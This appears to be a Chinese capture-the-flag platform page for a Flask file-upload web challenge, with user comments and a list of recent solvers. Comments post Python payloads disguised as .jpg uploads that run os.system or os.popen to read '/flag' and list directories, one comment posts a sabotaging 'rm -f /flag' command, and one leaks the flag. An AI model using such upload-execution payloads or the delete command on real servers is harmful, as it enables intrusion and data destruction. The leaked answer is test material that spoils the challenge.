Flask_FileUploadWEB 未解决

分数: 10 金币: 3
题目作者: valecalida
一  血: Lazzaro
一血奖励: 3金币
解  决: 12263
提  示:
描  述:
Flask_FileUpload
评论
alkaid45 1年前

import os print(os.popen('cat /flag').read())

回复 0

loulegedadong 1年前

意思是会将我们上传的文件用python去执行,并回显执行结果 那么我们就得在上传的文件里面写python代码,从而读取flag 随便传一个jpg图片,抓包,在文件内容中写python代码

回复 0

user0505 1年前

为什么访问不出网站啊?

回复 0

yqwapc001 1年前

回复 0

821170924 1年前

在.txt文本输入下面两行代码(注意换行),文件名改为flie 后缀.jpg接着F12查看源码直接有了。 import os //换行四个斜杠不要//os.system('cat /flag')

回复 1
jackflank 1年前

@Masterk 使用命令查看 上一级目录文件以及文件夹分布 os.system('ls ../')

回复 0

heichao666 1年前

@Masterk 试着试着就出来了

回复 0

Masterk 1年前

你怎么知道代码是写 cat /flag?

回复 0

X9527C 1年前

...

回复 0

群众里有坏人 1年前

建一个文本文档输import os os.system('rm - f /flag') 修改后缀名为.jpg或.png

回复 10
Despa1r 1年前

还是好人多

回复 7

nickeyes 1年前

这个需要上传一个可以查看flag的文件,文件后缀需要是jpg,上传成功后直接查看源代码,flag就直接显示了

回复 1

taozhi 1年前

提个醒.jpg也不可以哦,必须带个前缀

回复 1

htttpss 1年前

flag{3a9063cc6eada635c4f7586aab1da640}

回复 0

WriteUp

image
国家级划水运动员

3 金币

评分(20)

解题动态

2021060287 攻破了该题 9小时前
wlaqxb 攻破了该题 15小时前
aaaaab 攻破了该题 1天前
那天晚风和她 攻破了该题 2天前
姥姥 攻破了该题 2天前
聪10011 攻破了该题 4天前
xiaona1111 攻破了该题 4天前
qianye 攻破了该题 5天前
shuishuang1003 攻破了该题 6天前
zjh240609 攻破了该题 6天前
yamojito 攻破了该题 6天前
克瑞兹123 攻破了该题 6天前
咻猫 攻破了该题 7天前
mhxiaobai 攻破了该题 8天前
zeeker001 攻破了该题 8天前
huasir 攻破了该题 9天前
1494324192 攻破了该题 10天前
孙燕姿圈外男友 攻破了该题 10天前
liutong27 攻破了该题 10天前
阿狸沙堤 攻破了该题 13天前
问题反馈